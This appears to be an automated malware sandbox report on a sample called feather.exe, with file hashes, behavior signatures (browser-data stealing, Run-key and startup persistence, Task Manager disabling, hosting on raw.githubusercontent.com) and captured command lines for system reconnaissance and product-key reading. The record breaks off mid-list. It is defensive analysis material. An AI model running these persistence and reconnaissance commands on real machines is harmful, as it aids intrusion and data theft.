SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a8e767fd33edd97d306efb6905f93252
SHA1 a6f80ace2b57599f64b0ae3c7381f34e9456f9d3
SHA256 c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb
SHA512 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8567316010903a6a90b08458e30b6f82
SHA1 daf7d1d6c33f11198c2f55ba449d261c42c2a7da
SHA256 15e599233344ddd6f659ce83fb12ea673b2df6c9df50c4a5f05c7c1c3f85de49
SHA512 2a397ec18e7109f25e49af778cf1ba3d3114eedae1b39b9bd362730ead6ea26a7ed2832cffbf3bf0fee697e57388baabc07706f1c1d2f381e38e1bf2b961b465

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7198bdb3f2519408508c6f6bf6578450
SHA1 a58db09182f85c8ae3302050899225f0f8d377b2
SHA256 f740d32ecf9ab22961357e5ffac17f9a68aa17cd70511cf00b4c4ff644940173
SHA512 624864b99e6e5ac6a23f74c549efb606655cefd38e15d037757df2de682157c92654901afd07bf10c8a0a2dc7eeef92124f4ae57ec4d69820f1a8d71aea2691e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 af6c6a59e4c1015a1fb53baf63c675e2
SHA1 1f0cc03c5ec93676774097faabb1250b3265524a
SHA256 84ba92ab71200b1c85cdd263ab99bdd20444110ac57bdf40a6bb17eb12bb7b47
SHA512 fb45a2ee791888b7d2c2a065727c91e26c70749cf9b96d350c9749cf5d08486c2e2358b92c969ed6f1546e9af68b09c984f7593ccefe6e088d573f137a4dc1ca

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

121s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 18:10

Platform

win10v2004-20240426-en

Max time kernel

843s

Max time network

454s

Command Line

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Signatures

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\feather.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupqfB3Eu = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\feather.exe" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs C:\Windows\System32\svchost.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\feather.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Windows\system32\mspaint.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1804 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 4784 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4784 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1804 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 1608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1676 wrote to memory of 1608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5084 wrote to memory of 2232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5084 wrote to memory of 2232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5084 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 5084 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4340 wrote to memory of 4372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4340 wrote to memory of 4372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1608 wrote to memory of 2148 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1608 wrote to memory of 2148 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 4336 wrote to memory of 3352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4336 wrote to memory of 3352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4336 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4336 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1804 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 4200 wrote to memory of 3324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4200 wrote to memory of 3324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4200 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4200 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1968 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2044 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1804 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\net.exe

net session

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1804 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

